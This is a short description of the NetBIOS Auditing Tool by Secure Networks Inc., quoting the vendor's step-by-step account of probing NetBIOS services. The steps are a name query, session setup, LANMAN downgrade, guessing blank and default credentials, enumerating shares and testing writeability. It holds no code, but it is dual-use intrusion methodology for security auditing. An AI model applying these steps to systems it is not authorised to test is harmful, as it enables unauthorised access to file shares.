Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the
complete source code. It is the "SATAN" of NetBios based systems.
Here is a quote from Secure Networks Inc about the product -
"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services
offered by the target system. It implements a stepwise approach to gather information and
attempt to obtain file system-level access as though it were a legitimate local client.
The major steps are as follows:
A UDP status query is sent to the target, which usually elicits a reply containing the Netbios
"computer name". This is needed to establish a session. The reply also can contain other
information such as the workgroup and account names of the machine's users. This part of the
program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent
back to UDP port 137 even if the original query came from some different port.
TCP connections are made to the target's Netbios port [139], and session requests using the
derived computer name are sent across. Various guesses at the computer name are also used, in
case the status query failed or returned incomplete information. If all such attempts to establish a
session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was
reachable.
Provided a connection is established Netbios "protocol levels" are now negotiated across the new
connection. This establishes various modes and capabilities the client and server can use with
each other, such as password encryption and if the server uses user-level or share-level Security.
The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that
protocol is somewhat simpler and uses a smaller password keyspace than NT.
If the server requires further session setup to establish credentials, various defaults are
attempted. Completely blank usernames and passwords are often allowed to set up "guest"
connections to a server; if this fails then guesses are tried using fairly standard account names
such as ADMINISTRATOR, and some of the names returned from the status query. Extensive
username/password checking is NOT done at this point, since the aim is just to get the session
established, but it should be noted that if this phase is reached at all MANY more guesses can be
attempted and likely without the owner of the target being immediately aware of it.
Once the session is fully set up, transactions are performed to collect more information about the
server including any file system "shares" it offers.
Attempts are then made to connect to all listed file system shares and some potentially unlisted
ones. If the server requires passwords for the shares, defaults are attempted as described above
for session setup. Any successful connections are then explored for writeability and some well-known
file-naming problems [the ".." class of bugs].
If a NETBIOS session can be established at all via TCP port 139, the target is declared
"vulnerable" with the remaining question being to what extent. Information is collected under the
appropriate vulnerability at most of these steps, since any point along the way may be blocked by the
Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will
yield computer names and share lists, but not allow actual file-sharing connections without
a valid username and/or password. A remote connection to a share is therefore a possibly
serious Security problem, and a connection that allows WRITING to the share almost certainly so.
Printer and other "device" services offered by the server are currently ignored."
If you need more info on NAT, try looking at this web location:
http://www.secnet.com/ntinfo/ntaudit.html
http://www.rhino9.org